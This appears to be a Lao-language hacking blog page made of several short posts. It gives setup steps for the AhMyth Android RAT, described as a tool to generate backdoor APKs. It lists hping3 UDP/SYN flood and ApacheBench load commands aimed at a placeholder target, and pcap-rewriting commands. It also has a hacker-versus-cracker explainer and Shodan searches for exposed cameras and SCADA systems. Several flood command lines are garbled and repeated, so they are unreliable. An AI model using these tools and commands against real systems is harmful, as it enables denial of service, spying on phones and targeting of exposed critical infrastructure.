Welcome to my blog
ພໍດີໄປເຈີ Android RAT (Remote Administration Tool) ທີ່ເບິ່ງດີກວ່າ Metasploit (LoL) ກໍເລີຍເອົາມາເພື່ອໃຜຢາກເອົາມາລອງສຶກສາການທຳງານ
Prerequisite :
- Electron (to start the app)
- Java (to generate apk backdoor)
- Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
git clone https://github.com/AhMyth/AhMyth-Android-RAT.git cd AhMyth-Android-RAT npm start
ເບິ່ງວິດີໂອຂ້າງລຸ່ມ:
ຂໍ້ມູນຈາກ techsuii.com
1. UDP Flood
hping3 --udp --flood -p hping3 --udp -d --flood -p hping3 --udp -c --rand-source -d --flood -p hping3 --udp -c 15000 --rand-source -d 15000 --flood -p 80 target.com
2. TCP SYN Flood
hping3 -S -P -U --flood --rand-source target.com hping3 -S -L -w --flood -p 80 target.com hping3 -S -L 0 -w 64 --flood -p 80 target.com
3. Apache Benchmarking tool
ab -c -n ab -c 1000 -n 10000 http://target.com/
4. ການໃຊ້ tcpreplay + ແກ້ໄຂ
Generate cache file - tcpprep –auto=first –pcap=icmp.pcap –cachefile=icmp_in.cache Rewrite end points to 172.16.0.1/172.16.0.2 [ping 2->1, reply, 1->2] - tcprewrite –endpoints=172.16.0.1:172.16.0.2 -i out.pcap -o out2.pcap –cachefile=icmp_in.cache Rewrite macs too [ping (172.16.0.2)00:01:02:03:04:05 -> (172.16.0.1)06:07:08:09:10:11, reply: vice-versa] - tcprewrite –endpoints=172.16.0.1:172.16.0.2 –enet-smac=00:01:02:03:04:05,06:07:08:09:10:11 –enet-dmac=06:07:08:09:10:11,00:01:02:03:04:05 -i icmp.pcap -o out2_macs.pcap –cachefile=icmp_in.cache
ຫາກແກ້ໄຂ checksum ໂດຍທີ່ໃຊ້ - C ຂອງ tcprewrite ເພື່ອທຳການຄິດໄລ່ checksum ໃໝ່ ໃຫ້ໃຊ້ pcapfix ໃນການແກ້ໄຂແທນ
ຂໍ້ມູນຈາກ techsuii.com
Hacker ຄື ຜູ້ທີ່ມີຄວາມຮູ້ຄວາມເຂົ້າໃຈໃນລະບົບຄອມພິວເຕີຢ່າງສູງຫລາຍ ບໍ່ວ່າຈະເປັນເລື່ອງເຄືອຂ່າຍ, ລະບົບປະຕິບັດການ ຈົນສາມາດເຂົ້າໃຈວ່າລະບົບມີຊ່ອງໂຫວ່ບ່ອນໃດ ຫລື ສາມາດໄປຄົ້ນຫາຊ່ອງໂຫວ່ໄດ້ຈາກບ່ອນໃດນຳ ເມື່ອກ່ອນພາບຫລັກຂອງ Hacker ຈະເປັນພວກຊົ່ວ ມັກລັກຂໍ້ມູນ ຫລື ທຳລາຍໃຫ້ເສຍຫາຍ ແຕ່ດ໋ຽວນີ້ ຄຳວ່າ Hacker ໝາຍເຖິງ Security Professional ທີ່ຄອຍຖ້າໃຊ້ຄວາມສາມາດຊ່ວຍກວດກາລະບົບ ແລະ ແຈ້ງເຈົ້າຂອງລະບົບວ່າມີຊ່ອງໂຫວ່ບ່ອນໃດນຳ ອາດເວົ້າງ່າຍໆ ວ່າເປັນ Hacker ທີ່ມີຈະລິຍະທຳນັ້ນເອງ ໃນຕ່າງປະເທດມີວິຊາທີ່ສອນເຖິງການເປັນ Ethical Hacker ຫລື ແຮກເກີລ໌ແບບມີຈະລິຍະທຳ ຊຶ່ງແຮກເກີລ໌ແບບນີ້ຮຽກອີກຢ່າງວ່າ White Hat Hacker ກໍໄດ້ ສ່ວນພວກທີ່ນິໄສບໍ່ດີເຮົາຈະຮຽກພວກນີ້ວ່າ Cracker ຫລື Black Hat Hacker ຊຶ່ງກໍຄື ມີຄວາມສາມາດເໝືອນ Hacker ທຸກປະການ ພຽງແຕ່ພຶດຕິກຳຂອງ Cracker ນັ້ນຈະເປັນການກະທຳທີ່ຂາດຈະລິຍະທຳ ເຊັ່ນ ລັກຂໍ້ມູນ ຫລື ເຂົ້າໄປທຳລາຍລະບົບຄອມພິວເຕີໃຫ້ເຮັດວຽກບໍ່ໄດ້ ເປັນຕົ້ນ
ຂໍ້ມູນຈາກ: mindphp.com
ໃຊ້ເວັບໄຊ shodan ເປັນເວັບໄຊໃຫ້ບໍລິການຄົ້ນຫາຂໍ້ມູນເທີງອິນເຕີເນັດ ທີ່ສົ່ງພະລັງ ແລະ ໃຫ້ຂໍ້ມູນຫລາກຫລາຍ
ເຂົ້າເວັບໄຊ https://www.shodan.io/ ແລະ ມີວິທີການຄົ້ນຫາດັ່ງນີ້:
ໜ້າເວັບໄຊ
Image does not exist: https://image.ibb.co/b17mSk/shodanweb.png
ຄົ້ນຫາ ກ້ອງ ໃນປະເທດ USA ໃສ່: camera country: “US”
Image does not exist: https://image.ibb.co/m1QHYQ/shodanweb1.png
ຄົ້ນຫາລະບົບ Scada ໃສ່: scada
Image does not exist: https://image.ibb.co/fM40nk/shodanweb2.png
ເປົ້າໝາຍຂອງການນຳໃຊ້ ຄືການເພີ່ມຂີດຄວາມສາມາດໃນການຫາຂໍ້ມູນເບື້ອງຕົ້ນຂອງເປົ້າໝາຍ
ໂດຍການໃຊ້ຈຸດອ່ອນຂອງການສະໝັກຊື່ໂດເມນ ຊື່ງໃຊ້ເຄື່ອງມືທີ່ໃຊ້ ເວັບຮູບແບບ whois
ເຊັ່ນ myip.ms, dnsdumpster.com ແລະ tcpiputils.com
tcpiputils.com
Image does not exist: https://image.ibb.co/dEESHk/tcpiputils.png
myip.ms
Image does not exist: https://image.ibb.co/m45EV5/myip.png
dnsdumpster.com
Image does not exist: https://image.ibb.co/iy8q3Q/dnsdumpster.png
